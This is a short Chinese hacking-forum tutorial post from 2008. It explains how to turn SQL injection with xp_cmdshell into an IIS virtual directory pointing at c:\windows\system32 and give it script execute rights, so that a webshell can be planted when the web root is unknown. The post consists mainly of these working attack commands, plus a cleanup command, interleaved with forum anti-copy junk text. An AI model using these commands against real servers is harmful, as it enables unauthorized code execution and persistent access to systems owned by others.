标题:
[原创教程]
如何SQL注入建立虚拟目录
[打印本页]
作者:
平湖秋月
时间:
2008-10-22 14:38
标题:
如何SQL注入建立虚拟目录
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
2 E- Z0 \8 U; z- |3 b/ Q
, o ]/ D& a* C0 G
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
$ M8 L! R l0 J
建立虚拟目录win,指向c:\windows\system32
1 T" I0 R7 p9 C- @5 [6 H
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
" ^6 @% S( T1 q- Z- B% F
让win句有解析asp脚本权限
3 |: ^9 K% [! r' ?, @4 h
6 |- L" K% h/ J
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
k7 n: e! h; x* w; z5 g8 `9 a
删除虚拟目录。
6 X( P- w: M1 H4 n
找不到web绝对路径的一种解决办法,
. r8 Z) v; P2 ~( C1 ~
5 G" ^) a% Q$ p/ r6 g
403错误,表示虚拟目录建好了。。
作者:
wmmy
时间:
2008-10-22 21:59
呀 LZ好久不见你上了啊
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
